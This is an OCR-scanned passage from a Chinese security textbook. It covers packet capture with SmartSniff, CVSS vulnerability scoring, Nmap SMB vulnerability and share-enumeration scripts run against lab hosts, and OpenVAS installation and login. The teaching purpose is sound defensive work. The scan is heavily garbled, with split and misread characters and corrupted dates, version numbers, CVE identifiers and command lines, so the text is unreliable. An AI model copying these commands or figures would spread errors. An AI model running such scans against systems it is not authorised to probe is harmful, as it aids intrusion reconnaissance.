主机 192.168.0.105 庙 口 0080… 开 启 frrTP) 


区 .270 


实战 演练 2 一 一 捕获 网 络 中 的 TCP/IP 数 
据 包 


SmartSniff 工 具 可 以 让 用 户 捕获 自己 
的 网 络 适配器 的 TCP/IP 数 据 包 ， 并 且 可 以 
按 顺序 查看 客户 端 与 服务 器 之 间 会 话 的 数 
据 。 用 户 可 以 使 用 ASCII 模 式 〈 用 于 基于 
文本 的 协议 ， 如 HTTP、SMTP、POP3 与 
FTP) 、 十 六 进 制 模式 来 查看 TCP/IP 会 话 
〈 用 于 基于 非 文本 的 协议 ， 如 DNS) 。 

利用 SmartSniff 捕 获 TCP/IP 数 据 包 的 具 
体操 作 步 又 如 下 : 
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团 Smartsniff 一 口 x 


文件 (站 ” 匆 颖 {E) 视图 (V) 选项 (O) 帮助 (H) 
红 

协议 。 本 地 地 址 运程 地 址 本 地 铀 口 。 ”远程 灸 口 人 

UDP 192.168.0.105 123.151.78.54 4022 8000 

TCP 192.168.0.105 125.88.219.247 3255 443 

TCP 192.168.0.105 180.149.131.35 3388 443 

TCP 192.168.0.105 180.149.131.35 3389 443 

TCP 192.168.0.105 125.77.198.152 53891 80 MY 

» 

ES 兰芝 27 个 数据 包 


[sep 图 单 去“ 停止 捕获 ”按钮 或 按 F6 键 ， 停 
止 捕获 数据 ， 在 列表 中 选择 任意 一 个 TCP 类 
型 的 数据 包 ， 即 可 查看 其 数据 信息 ， 如 下 
图 所 示 。 

本 smansnf 有 可 区 


文件 胡 ” 闪 各 上 视 蝇 M)， 运 和 CO 帮助 IH) 
Pa 了 A 口 园 写 加 四 


本 翅 主机 
DESKTOP-SCVE. 
DESKTOP-67NQ. 


80 69 00 00 09 77 77 77 0 
72 g2 62 6E 0 G0 01 上 


Ca éF 81 88 00 81 00 01 90 09 99 90 69 77 77 77 .0 a 


98 77 65 68 61 6D bp 65 72 gz 53 6E ee 99 91 99 .vehamme r.cn~ 


人 个 ICPIIp 全 寺 已 还 绊 1 个 


[Estee 国 在 列表 中 选择 任意 一 个 UDP 类 型 的 数 
据 包 ， 即 可 查看 其 数据 信息 ， 如 下 图 所 示 。 


妆 伯 有 ” 坊 二 (E) 讽 国 VM) 运 吉 (Oj 帮助 H) 

> 四 | 平 兴 | 口 回 曲 字 腊 

于 1。 协议。 本 地 地 址 EE 本 i 其 口 。。” 远 尖 中 。。 本 交 主 册 . 
B37 UDP 1921680.106 192.168.0.255 138 138 DESKTOP SCVE.. 
o 

@39 UDP 1921680.105 118.147.201.44 5001 8000 DESKTOP-67NQ-. 
40 Tp 1921680105 12576247199 3421 a0 DESKTOP-67NQ- 
B41 Tp 1921680.105 12576247.199 3423 a0 DESKTOP-67NQ-. 
好。 Upp 1021680105 61128114134 50524 53 pESxrop-E7NQ_ 
B43 TP 1921680.105 1205588.244 3511 a0 DESKTOP-67NQ-. ~ 


02 63 00 00 90 9 13 89 fh 68 06 68 33 ED 81 99 
上 5 48 B8 SA 58 99 45 85 
8 66 BB 39 DD EF BE ge Fé AA BO BD h7 C2 gc 90 
9 10 24 EB HD AF 61 59 72 16 1E 9F 40 1D AA 68 
‘D DH E6 DS gD C6 BH 77 96 SF A3 18 69 hh 85 pn 
11 ga 99 


44 个 TCP/IPs 读 芝 1 个 
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[Ses 国 在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“视图 ”一 “网 页 报告 -TCP/IP 数 据 流 ” 命 
令 ， 即 可 以 网 页 形式 查看 数据 流 报 告 ， 如 
下 图 所 示 。 


Sr 
DO 


x | 于 ~ 


加 file/W/DV360 安 全 测 


[se 图 在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“文件 ”一 “属性 ”菜单 命令 ， 在 弹出 的 
“属性 ”对 话 框 中 可 以 查看 其 属性 信息 ， 
如 下 图 所 示 。 

属性 x 


案 引 : 
协议 : 
本 地 地 址 : 
远程 地 址 : 
本 地 端口 : 5000 
远程 端口 : 8000 
本 地 主机 : DESKTOP-67NQBIF.DHCP HOST 
远程 主机 : 
服务 名 称 : 
包 : 
数据 大 小 : 
总 大 小 : 
数据 速率 : 
捕获 时 则 : 201718115 
最 后 包 体 时 间 : [201718115 1 
进程 ID: 
进程 文件 名 : 
进程 用 户 : L 
加 载 MAC 地 址 : 
远程 MAC 地 址 : 
本 地 IP 国 家 : 
远程 IP 国 穿 : 


D 六 va Dk 口 和 国 风 tX 主 
数据 流 报告 

索引 如 

协议 UDP 

本 地 地 址 192. 168. 0. 105 

远程 地 址 61. 128. 114. 134 

本 地 着 口 0524 

部 口 | 5 

本 地 主机 。 | asFTop-amIEIF.DHF HDsT 
远程 主机 | ts. xi. teleccn con 


11.4 小 试 身 手 
练习 1: 扫描 主机 的 各 种 端口 。 


练习 2: 
练习 3: 
练习 4: 


扫描 主机 的 Banner 信 息 。 
扫描 主机 的 常见 协议 。 
探测 主机 的 防火 墙 。 
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第 12 半 ”无 线 网 络 中 主机 漏洞 的 
安全 防护 


漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 缺陷 ， 从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 本 章 介绍 如 何 对 无 线 网 络 中 的 主机 进行 漏洞 
扫描 ， 主 要 包括 系统 漏洞 概述 、 系 统 漏洞 评分 标准 一 一 CVSS、 使 用 Nmap 扫 描 漏 洞 、 使 用 
OpenVAS 扫 描 漏洞 、 使 用 Nessus 扫 描 漏洞 、 系 统 漏洞 的 安全 防护 等 。 


12.1 系统 漏洞 概述 


计算 机 系统 漏洞 也 被 称 为 系统 安全 缺 
陷 。 这 些 安全 缺陷 会 被 技术 高 低 不 等 的 入 
侵 者 所 利用 并 达到 控制 目标 主机 或 造成 一 
些 更 具 破坏 性 的 目的 。 


12.1.1 系统 漏洞 的 定义 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软 
件 在 逻辑 设计 上 的 缺陷 ， 或 在 编写 时 产 
生 的 错误 ， 某 个 程序 (包括 操作 系统 ) 
在 设计 时 未 考虑 周全 ， 则 这 个 缺陷 或 错误 
将 可 能 被 不 法 者 或 黑客 利用 ， 通 过 植 入 病 
毒 等 方式 来 攻击 或 控制 整个 计算 机 ， 从 而 
窃取 计算 机 中 的 重要 资料 和 信息 ， 甚 至 破 
坏 系统 。 

系统 漏洞 又 称 安全 缺陷 ， 可 对 用 户 造 
成 不 良 后 果 。 如 系统 漏洞 被 恶意 用 户 利用 ， 
会 造成 信息 泄露 ， 黑 客 攻击 网 站 即 利用 网 络 
服务 器 操作 系统 的 漏洞 ， 对 用 户 操作 造成 不 
便 ， 如 不 明 原因 的 死机 和 丢失 文件 等 。 


12.1.2 ”系统 漏洞 产生 的 原因 

系统 漏洞 的 产生 不 是 安装 不 当 的 结 
果 ， 也 不 是 使 用 后 的 结果 ， 它 受 编程 人 员 
的 能 力 、 经 验 和 当时 安全 技术 所 限 ， 在 程 
序 中 难免 会 有 不 足 之 处 。 

归结 起 来 ， 系 统 漏洞 产生 的 原因 主要 
有 以 下 几 点 : 


(1) 人 为 因素 。 编 程 人 员 在 编写 程序 
过 程 中 故意 在 程序 代码 的 隐蔽 位 置 保留 了 
后 门 。 

(2) 硬件 因素 。 因 为 硬件 的 原因 ， 编 
程 人 员 无 法 弥补 硬件 的 漏洞 ， 从 而 使 硬件 
问题 通过 软件 表现 出 来 。 

(3) 客观 因素 。 受 编程 人 员 的 能 力 、 
经 验 和 当时 的 安全 技术 及 加 密 方法 所 限 ， 
在 程序 中 不 免 存在 不 足 之 处 ， 而 这 些 不 足 


恰恰 会 导致 系统 漏洞 的 产生 。 
12.2 系统 漏洞 评分 标准 一 一 
CVSS 


通用 弱点 评价 体系 (CVSS) 是 由 
NIAC 开 发 、FIRST 维 护 的 一 个 开放 并 且 能 
够 被 产品 厂商 免费 采用 的 标准 。 利 用 该 标 
准 ， 可 以 对 弱点 进行 评分 ， 进 而 帮助 我 们 
判断 修复 不 同 弱点 的 优先 等 级 。 


12.2.1 CVSS 简 介 


CVSS (Common Vulnerability Scoring 
System 通 用 漏洞 评分 系统 ) 是 一 个 行业 公 
开标 准 。 可 以 帮助 人 们 建立 衡量 漏洞 严重 
程度 的 标准 ， 使 得 人 们 可 以 比较 漏洞 的 严 
重 程度 ， 从 而 确定 处 理 它们 的 优先 级 。 

CVSS 得 分 基于 一 系列 维度 上 的 测量 
结果 ， 这 些 测量 维度 被 称 为 量度 (Met- 


rics) 。 漏 洞 的 最 终 得 分 最 大 为 10， 最 小 为 
0。 得 分 在 7 一 10 中 的 漏洞 是 高 危 漏 洞 通常 
被 认为 比较 严重 ， 得 分 在 4 一 6.9 中 的 是 中 级 
漏洞 ， 得 分 在 0 一 3.9 中 的 则 是 低级 漏洞 。 

CVSS 系 统 包括 三 种 类 型 的 分 数 : 基本 
分 、 暂 时 分 和 环境 分 。 其 中 ， 基 本 分 和 和 暂 
时 分 通常 由 安全 产品 卖主 、 供 应 商 给 出 ， 
因为 他 们 能 够 更 加 清楚 地 了 解 漏洞 的 详细 
信息 ; 环境 分 通常 由 用 户 给 出 ， 因 为 他 们 
能 够 在 自己 的 使 用 环境 下 更 好 地 评价 该 漏 
洞 存在 的 潜在 影响 。 
12.2.2 CVSS 计 算 方法 

CVSS 有 自己 的 一 套 漏 洞 评分 计算 方 
法 ， 但 也 有 一 些 指标 具有 不 确定 性 和 复杂 


性 ， 会 导致 完全 的 定量 分 析 困 难 。 它 采用 3 
个 客观 性 指标 和 11 个 主观 性 指标 。 


1. 基本 评价 


基本 评价 指 的 是 该 漏洞 本 身 固有 的 一 
些 特点 ， 及 这 些 特点 可 能 造成 的 影响 评价 
分 值 。 

(1) 攻击 途径 (AccessVector) 。 如 果 
是 本 地 攻击 给 0.7， 可 以 远程 攻击 给 1.0。 

(2) 攻击 复杂 度 (AccessComplexity) 。 
分 为 3 个 标准 分 别 是 低 、 中 、 高 ， 给 出 的 
分 值 为 0.6、0.8、1.0。 

(3) 认证 (Authentication》〉。 需 要 认证 
给 0.6， 不 需要 认证 给 1.0。 

(4) 机 密 性 (ConfImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(5) 完整 性 (IntegImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(6) 可 用 性 〈Availimpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 


2. 生命 周期 评价 
生命 周期 评价 是 针对 最 新 类 型 漏洞 
〈 如 0day 漏 洞 ) 设置 的 评分 项 ， 因 此 SQL 注 
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入 漏洞 不 用 考虑 。 这 里 列举 出 了 3 个 与 时 间 
紧密 关联 的 要 素 ， 具 体 介绍 如 下 : 

(1) 可 利用 性 。 未 证 明 0.85， 概 念 证 
明 0.9， 功 能 性 0.95， 完 全 代码 1.0。 

(2) 修复 措施 。 官 方 补丁 0.87， 临 时 
补丁 0.9， 临 时 解决 方案 0.95， 无 措施 1.0。 

(3) 确认 程度 。 不 确认 0.9， 未 经 确认 
0.95， 已 确认 1.0。 


3. 环境 评价 

每 个 漏洞 会 造成 的 影响 大 小 都 与 用 户 
自身 的 实际 环境 密 不 可 分 ， 因 此 可 选项 中 
也 包括 了 环境 评价 。 可 以 由 用 户 自 评 。 

(1) 危害 影响 程度 。 无 0.0， 低 0.1， 
中 0.3， 高 0.5。 

(2) 目标 分 布 范围 。 无 0.0， 低 0.25， 
中 0.75， 高 1.0 (0、1% 一 15%、16% 一 
49%、50% 一 100%) 。 

评分 与 危险 等 级 对 应 如 下 : 

e [0，4): 被 认为 是 低级 威胁 。 

e [4，7): 被 认为 是 中 级 威胁 。 

e [7，10]: 被 认为 是 高 级 威胁 。 

不 同 机 构 按 照 CVSS 分 值 定义 威胁 
的 低 、 中 、 高 级 别 ，CVSS 体 现 漏 洞 的 风 
险 ， 威 胁 级 别 表示 漏洞 风险 对 系统 的 影响 
程度 ，CVSS 分 值 是 工业 标准 ， 威 胁 级 别 
不 是 。 


12.3 ”使 用 Nmap 扫 描 漏洞 


Nmap 自 带 有 大 量 脚本 ， 通 过 脚本 配置 
规则 ， 并 配合 进行 漏洞 扫描 。 


12.3.1 脚本 管理 


Nmap 有 一 个 脚本 数据 库 文件 ， 使 用 该 
数据 库 可 以 对 所 有 的 脚本 进行 分 类 管理 。 
查看 脚本 数据 库 文件 的 方法 为 ， 在 usr/share/ 
Nmap/scripts 目 录 中 有 一 个 script.db 文 件 。 
该 文件 用 于 维护 Nmap 所 有 脚本 文件 ， 在 
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Kali Linux 命 令 执行 窗口 中 输入 cat script.db 命 令 ， 即 可 查看 数据 库 内 容 ， 执 行 效果 如 下 图 
所 示 。 


‘oot@kali: /usr/share/naap/scripts# cat script.db 

ntry { = "acarsd-info.nse", categories = { "discovery", "safe", } } 
ntry { "address-info.nse"，categories = { "default", "safe", } } 
ntry { -brute.nse", categories = { "brute", "intrusive"”, } } 
ntry { -ls.nse", categories = discovery", "safe", } } 
ntry { -path-vuln.nse", categories = { "exploit", "intrusive" 
ntry { -serverinfo.nse", categories = { “default" 

ntry { -shownount.nse", categories = { "discovery 

ntry { -auth.nse", categories = { "auth", "default safe"，} } 
ntry { -brute.nse", categories = { "brute", "intrusive”, } } 
ntry { -headers.nse"，categories = { "discovery", "safe", } } 


每 一 个 脚本 后 面 都 有 一 个 分 类 (categories) 信息 ， 分 别 是 默认 〈default) 、 发 现 
(discovery) 、 安 全 (safe) 、 暴 力 (brute) 、 入 侵 (intrusive) 、 外 部 的 (external)、 
漏洞 检测 〈vuln) 、 漏 洞 利用 (exploit〉。 

另外 ， 如 果 执 行 less script.db | we -] 命 令 ， 可 以 查看 到 目前 Nmap 有 588 个 脚本 ， 如 下 图 
所 示 。 


Foot@kali: /usr/share/nmap/scripts# Tess script.db | we -U 
588 


侈 提示 : 如 果 用 于 检测 ， 尽 量 挑选 safe 字 段 的 脚本 进行 扫描 ， 否 则 可 能 因为 扫描 导致 目标 
主机 系统 不 稳定 。 


12.3.2 ”扫描 演示 


使 用 Nmap 的 脚本 文件 ， 可 以 扫描 系统 漏洞 ， 下 面 以 smb-vuln-ms10-061.nse 脚 本 为 
例 ， 来 介绍 使 用 Nmap 进 行 漏洞 扫描 的 方法 ，smb-vuln-ms10-061 是 Stuxnet 蠕 虫 病毒 利用 的 
4 个 漏洞 之 一 ， 该 漏洞 是 由 于 Print Spooler 权 限 配 置 不 当 造 成 的 ， 这 个 漏洞 可 使 打印 请 求 在 
系统 目录 下 创建 文件 、 执 行 任意 代码 等 。 

使 用 Nmap 扫 描 漏洞 的 操作 步骤 如 下 : 
step 加 使 用 less script.db | grep smb-vuln 命 令 。 和 节选 出 符合 标准 的 脚本 文件 ， 执 行 效果 如 下 
图 所 示 。 


FaatBRBUIS7UST7SWaTETWSP7SETIPES Less SCFIPEt-d6 | grep smb-vutn 
Entry { filenam smb-vuln-conficker.nse", categories = { "dos", "exploit", "intrusive", " 
smb-vuln-cve-2917-7494.nse”, categories = { “intrusive”, “vuln", } } 
smb-vuln-cve2009-3103.nse”", categories = 
smb-vuln-ms06-025.nse", categories = { "di 
smb-vuln-mse7-029.nse", categories 
smb-vuln-ms98-967.nse", categories 
smb-vuln-ms10-054.nse", categories 
smb-vuln-ms10-061.nse", categories "intrusive", "vuln", 
smb-vuln-ms17-016.nse", categories "safe", "vuln", } } 
bb-vutn-regsvc-dos.nse"，cateqories = { "dos”, "exploit", "intrusive", "vuln", } } 


step 图 使 用 cat smb-vuln-ms10-061.nse 命 令 。 查 看 该 脚本 的 帮助 信息 ， 执 行 效果 如 下 图 所 
示 ， 可 以 看 到 CVSS 评 分 达到 了 9.3 分 ， 因 此 这 个 漏洞 是 一 个 高 危 漏洞 。 


"dps", = 


人 


{D5 SETIDE TesULLST 
| smb-vuin-ns10-B61: 

| VuLNERABLE: 

| Print Spooler service Inpersonation Vulnerability 

| state: VULNERABLE 

| 。 IDs: cVE:CVE-2919-2729 

| Risk factor: HIGH CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) 

| Description: 

| The Print Spooler service in Microsoft Windows Xp,Server 2003 Sp2,Vista,Server 2008, and 7, when printer sharing is enabled, 

| does not properly valldate spooler access pernissions, which allows remote attackers to create files in a systen directory, 

] and consequently execute arbitrary code, by sending a crafted print request over RPC，as exploited in the wild in Septenber 2810, 
| aka “Print Spooler Service Impersonation Vulnerability 

| 

] 

| 

| 

| 

1 


Disctosure date: 2019-69-5 
References: 

http://cve.mitre.org/cgi-bin/cvenane. cgi?nase=CVE-2010-2729 

http://technet. nicrosoft.con/en-us/security/bulletin/Hs16-061 

http://blogs. technet, com/b/srd/archive/2810/89/14/ms16-061-printer-spooler-vulnerability.aspx, 
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step 图 如 果 通 过 smb-vuln-ms10-061.nse 脚 本 没有 发 现任 何 漏洞 。 还 可 以 尝试 使 用 smb-enum- 
shares.nse 脚 本 。 该 脚本 会 对 目标 主机 进行 枚 举 ， 发 现 所 有 可 能 存在 的 共享 。 使 用 less 
script.db | grep smb-enum 命 令 ， 筛 选 出 该 脚本 文件 ， 执 行 效果 如 下 图 所 示 。 


i share/nmap/scripts# less script.db | grep smb-enum 


ntry { filename = “smb-enum-domains.nse", categories = { “discovery", 
ntry { filename = "smb-enum-groups.nse", categories = { "discovery"， 

ntry { filename = "smb-enum-processes.nse", categories = 机 
Ey { filename = "smb-enum-services.nse", categories { "di 


"intrusive", } } 
ntrusive", } } 
"intrusive”, } } 
"intrusive", "safe", } } 


ntry { filename "smb-enum-session e", Categories ={™" 
"smb-enum-shares.nse"，categories = { "discovery"， 
"smb-enum-users.nse", categories = { "auth", "intrusive"”, } } 


CE 


ntry { filename 
ntry { filename 


Step 加 使 用 Nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 命 令 。 可 以 发 现 通过 枚 举 
脚本 发 现 目标 机 器 开放 445 端 口 ， 执 行 效果 如 下 图 所 示 。 
root@kali: /usr/share/nmap/scripts# nmap -p445 192.168.1.165 --script=smb-enum-shares.nse 
Starting Nmap 7.79 ( https://nmap.org ) at 2018-10-29 65:35 EDT 


Nmap scan report for 192.168.1.165 
Host is up (9.999465 Latency) . 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
C Address: 99:9C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds 


[step 图 使 用 Nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-061 命 令 。 扫 描 主 机 发 现 并 不 
存在 该 漏洞 。 这 个 现象 在 漏洞 扫描 中 也 很 正常 ， 并 不 是 所 有 开放 端口 的 机 器 都 存在 漏洞 ， 
执行 效果 如 下 图 所 示 。 
FootGKati: /usr/share/nmap/scripts# nmap -p 445 192.168.1.195 --script=smb-vuln-ms10-66] 
Starting Nmap 7.76 ( https://nmap.org ) at 2618-19-29 65:46 EDT 


Nmap scan report for 192.168.1.195 
Host is up (9.99932s latency). 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
IAC Address: 69:6C:29:FA:DD:2A (VMware) 


Host script results: 
|_smb-vuln-ms10-661: false 


Nmap done: 1 IP address (1 host up) scanned in 6.57 Seconds 
et: usr/share/nmap/scripts# nmap -p 445 192.168.1.193 --script=smb-vuln-ms10-06, 


12.4 ”使 用 OpenVAS 扫 描 漏洞 


OpenVAS (Open Vulnerability Assessment System) 是 一 个 开放 式 漏洞 评估 系统 ， 其 核 
心 部 分 是 一 个 服务 器 。 该 服务 器 包括 一 套 网 络 漏洞 测试 程序 ， 可 以 检测 远程 系统 或 应 用 程 
序 中 的 安全 问题 。 


12.4.1 ”安装 OpenVAS 
默认 情况 下 ，Kali 系 统 并 没有 安装 该 扫描 工具 ， 因 此 想 要 使 用 它 必须 要 先 安 装 。 在 
Kali 系 统 中 安装 OpenVAS 的 操作 步 又 如 下 : 


step 图 在 Kali Linux 系 统 的 命令 执行 界面 中 输入 apt-get install openvas 命 令 ， 执 行 效果 如 下 图 
所 示 。 
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root@kali:-# apt-get install openvas 

正在 读 取 软 件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状态 信息 ... 完成 

下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 

libbind9-168 libdns11962 Libirs166 Libisc169 Libisccc166 Libisccfg169 
LibUwres169 libpoppler74 Libprotobuf-Litel9 Libprotobuf16 libradare2-2.9 
libunbound2 Libx265-169 python-backports.ssl-match-hostname 
python-beautifulsoup python-jwt ruby-terminal-table 
ruby-unicode-display-width 

使 用 'apt autoremove' 来 卸载 它 ( 它 们 )。 


step 图 安装 过 程 会 提示 将 要 安装 哪些 库 及 支持 文件 ， 并 给 出 建议 安装 文件 ， 如 下 图 所 示 。 


用 会 同时 安装 下 列 软件 : 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredise.14 Libtua5.1-9 
libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
Lua-cjson openvas-cli openvas-manager openvas-manager-common openvas-scanner 
preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

建议 安装 : 

rarian-compat openvas-client pnscan strobe ruby-redis 
texlive-fonts-recommended-doc icc-profiles libfile-which-perl 
libspreadsheet-parseexcel-perl texlive-latex-extra-doc 

texlive-latex- recommended-doc texlive-pstricks dot2tex prerex ruby-tcltk 
| libtcltk-ruby texlive-pictures-doc vprerex 


[step 图 同时 ， 在 界面 的 下 面 会 提示 是 否 安装 文件 ， 如 下 图 所 示 。 


下 列 【 软件 包 将 被 安装 ; 
doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis9.14 Libtua5.1-9 

Libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas openvas-cli openvas-manager openvas-manager-common 
openvas-scanner preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

升级 了 9 个 软件 包 ,新 安装 了 28 个 软件 包 ， 要 卸载 9 个 软件 包 ,有 9 个 软件 包 未 被 升级 
有 85.6 MB 的 归档 。 


压缩 后 会 消耗 252 MB 的 关外 空间 。 
硕 望 继续 执行 吗 ? [Y/n] y 


[Eee 国 如 果 需 要 安装 ， 这 时 可 以 按 Y 键 执行 安装 ， 如 下 图 所 示 。 


FaatBRaUIS-W 0pcnva5-5et0P 


>】 Updating 0penVAS feeds 

“1 [73] updating: MVT 

-2818-10-28 21:57:98-- http://dl.greenbone.net/conmunity-nvt- feed-current.tar.b22 

在 解析 主机 dl.greenbone.net (dl.greenbone.net).. 9:2898:127:;d1 
在 连接 中 -greenbone.net (dt .greenbone.net)189-146-224.58|:88-- “已 连接 。 

发 出 HTTP 请 求 ， 正 在 等 竺 回应 ,. 。208 OK 

匿 : 36207248 (29M) [application/octet-stream] 

在 保存 至 ;“/tmp/greenbone-nvt-sync.ULkb7T24I3/openvas-feed-2018-10-28-5266. tar.bz2” 


tmp/greenbone-nvt-sync.UL 100%[= 28.81M 6.65MB/s 用 时 5.7s 


018-10-28 21:57:16 (5.65 MB/s) - 已 保存 “/tnpygreenbone-nvt-sync.ULkb7Tz4T3/openvas-feed-2918-19-28- 
266. tar .bz2” [30207248/39297248]) 


耐心 等 待 安装 完成 。 这 里 会 有 一 个 初始 密码 ， 一 定 要 先 保存 这 个 密码 ， 否 则 无 法 登 
录 系 统 ， 如 下 图 所 示 。 


[*J Opening Web UI (https://127.0.0.1:9392) in: 5... 4... 3... 2... 1.. 


I>] Checking for admin user 始 密码 
[*] Creating admin user 初 
User created with password【|fd439f97-1918-479d-a3f2-229f7926c179 小 


I[z] Done 


step 较 由 于 OpenVAS 是 一 个 非常 庞大 的 漏洞 扫描 库 ， 因 此 安装 过 程 中 可 能 会 出 现 文件 缺少 
等 错误 ， 这 时 ， 可 以 使 用 openvas-check-setup 命 令 ， 检 查 安 装 是 否 完整 ， 如 下 图 所 示 。 


Seas Uke your UPETVRS-9 InstaLUatIOT ITS OK- 


Yo tit not dey les enor ayo lf beraten 
nd help us to improve this check routine: 
ttp://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Lease attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem 
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侈 提 示 : 在 检查 安装 结果 中 ， 如 果 看 到 提 
示 OK， 表 明正 常安 装 完成 ， 如 果 出 现 错 
误 ， 这 里 会 给 出 尝试 修复 的 建议 。 


[see 图 如 果 安 装 完 成 忘记 保存 初始 密码 ， 
可 以 通过 openvasmd --get-users 命 令 ， 查 看 
OpenVAS 中 都 有 哪些 用 户 ， 当 然 如 果 是 初次 
安装 只 会 有 一 个 管理 员 账 号 ， 如 下 图 所 示 。 


1 UsSr/share/nmap/scripts# openvasmd 
dmin_ 


-get-users 


[step 较 由 于 OpenVAS 是 安全 漏洞 扫描 工 
具 ， 为 了 保证 扫描 的 准确 性 ， 建 议 经 常 
对 软件 进行 升级 ， 这 时 可 以 使 用 Updating 
OpenVAS feeds 命 令 对 OpenVAS 进 行 定期 检 
查 升级 ， 如 果 存在 升级 会 自动 进行 更 新 。 
下 图 为 截取 的 部 分 更 新 信息 。 


旧 Updating 0penVAS feeds 


*1 [1/3] Updating: NVT 
ent 159,119 bytes received 12,217,759 bytes 
otal size is 247,656,755 speedup is 19.96 


575,668.74 bytes/sed 


*] [2/3] Updating; Scap Data 

ent 328,324 bytes received 4,213,698 bytes 259,538.97 bytes/sec 
‘otal size is 992.859,082 speedup is 218.60 

usr/sbinyopenvasmd 

| [3/3] Updating: Cert Data 

ent 22,771 bytes received 134,431 bytes 34,933.78 bytes/sec 
otal size is 55,172,448 speedup is 358.97 

usr/sbln/openvasmd 


第 12 章 无 线 网 络 中 主机 漏洞 的 安全 防护 Eee 


12.4.2 ”登录 OpenVAS 


安装 完 OpenVAS 软 件 ， 并 设置 好 账号 
密码 后 ， 便 可 以 登录 OpenVAS。OpenVAS 
采用 Web 登 录 ， 管 理 起 来 非常 方便 。 初 次 登 
录 OpenVAS 需 要 一 些 简 单 的 设置 ， 具 体 的 
设置 步骤 如 下 : 
[steep 国 OpenVAS 启 动 后 会 打开 一 些 939 系 列 
端口 。 使 用 netstat -pantu | grep 939 命 令 查看 
端口 信息 并 过 滤 出 939 系 列 端口 ， 执 行 效果 
如 下 图 所 示 。 其 中 9390 是 OpenVAS 服 务 端 
口 ，9392 是 Web 登 录 端 口 。 
Footerali: -# netstat -pantu | grep 939 
| 


tcp 6 9 127.0.0.1:9399 6.6.6.9:*+ LISTEN 6512/0openvasm 
tcp 8 9 127.9.6.1:9392 6516/gsad 


如 果 9392 端 口 开放 ， 便 说 明 OpenVAS 
的 服务 已 经 启动 ， 通 过 浏览 器 可 以 登录 Web 
页 面 ， 初 次 登录 会 有 警告 信息 ， 如 下 图 
所 示 。 


6.9.6.9:+ LISTEN 


pour comection is not securd 
竣 


The owner of 127.0.0.1 has configured their website improperly. To protect your information from being stolen, 


Firefox has not connected to this website. 


Learn more. 


Report errors like this to help Mozilla identify and block malicious sites 


Advanced 


这 是 由 于 OpenVAS 采 用 HTTPS 加 密 传输 协议 ， 因 此 会 提示 安装 证 书 问题 ， 这 时 需 在 
警告 信息 界面 中 单 击 Advanced 按 钮 ， 进 入 下 图 所 示 的 界面 。 


27.0.0.1:9392 uses an invalid security certificate. 


he certificate is not trusted because the issuer certificate is unknown. 
he server might not be sending the appropriate intermediate certificates. 


nadditional root certificate may need to be imported. 


he certificate is not valid for the name 127.0.0.1. 


Error code: SEC_ERROR_UNKNOWN_ISSUER 


Add Exception.. 


@ 移 注意 : 如 果 是 本 机 登录 可 以 使 用 https:// 127.0.0.1:9392/ 进 行 登录 。 


step 园 单 击 Add Exception 按 钮 ， 会 弹出 一 个 确认 添加 证 书 的 警告 信息 ， 如 下 图 所 示 。 
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Add Security Exception © 


Youare about to ovarride how Firefox identifies this site. 
Legitimate banks, stores, and other public sites will not ask you to do this. 


Server 
Location: | ntps11270 本 Get Certificate 
Certificate Status 


This site attempts to identify itself with invalid information. ne 


WrongSite 


The certificate bclongs tya different sitc, which could mcar that somconc is trying to impersonate this sitc. 
Unknown Identity 


The certificate Is not trusted because Ithasn't been verifledas Issued by a trusted authorlty usIng a secure signature. 


[DPermanently store this exception 


Confirm Security Exception Cancel 


step 较 单 击 Confirm Security Exception 按 钮 ， 确 认 添 加 安全 证 书 ， 并 跳 转 到 下 图 所 示 的 登录 
界面 ， 在 其 中 输入 管理 员 账 号 与 密码 。 


Password: 


2 


Greenbone | 
Security 
Assistant 


单 击 Longin 按 钮 ， 进 入 下 图 所 示 的 主 界面 。 


上 osoosra 


侈 注意 : 如 果 系 统 重启 后 ， 默 认 OpenVAS 不 自动 启动 ， 需 要 手动 开启。 手动 开启 的 命令 
为 openvas-start， 执 行 效果 如 下 图 所 示 。 


Foot@kali:-~# openvas-start 
[*] Please wait for the 0penVAS services to start. 

[*] 

[*] You might need to refresh your browser once it opens. 


[s 
[*] Web UI (Greenbone Security Assistant): https://127.9.9.1:9392 


12.4.3 ”配置 OpenVAS 
登录 OpenVAS 后 ， 便 可 以 配置 相关 扫描 信息 ，OpenVAS 提 供 了 丰富 的 配置 选项 ， 既 可 
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以 配置 快速 扫描 选项 ， 也 可 以 手动 配置 个 
性 化 扫描 选项 。 下 图 为 OpenVAS 框 架 的 运 


行 示意 图 。 
.OpenVAS 9 
Scan Targets 1 


让 


| 
| ? 
| 中 
大 致 分 为 以 下 几 个 组 件 : 
e Scanner 组件: 用 于 扫描 ， 它 会 从 
NVT 数 据 库 中 提取 漏洞 信息 。 


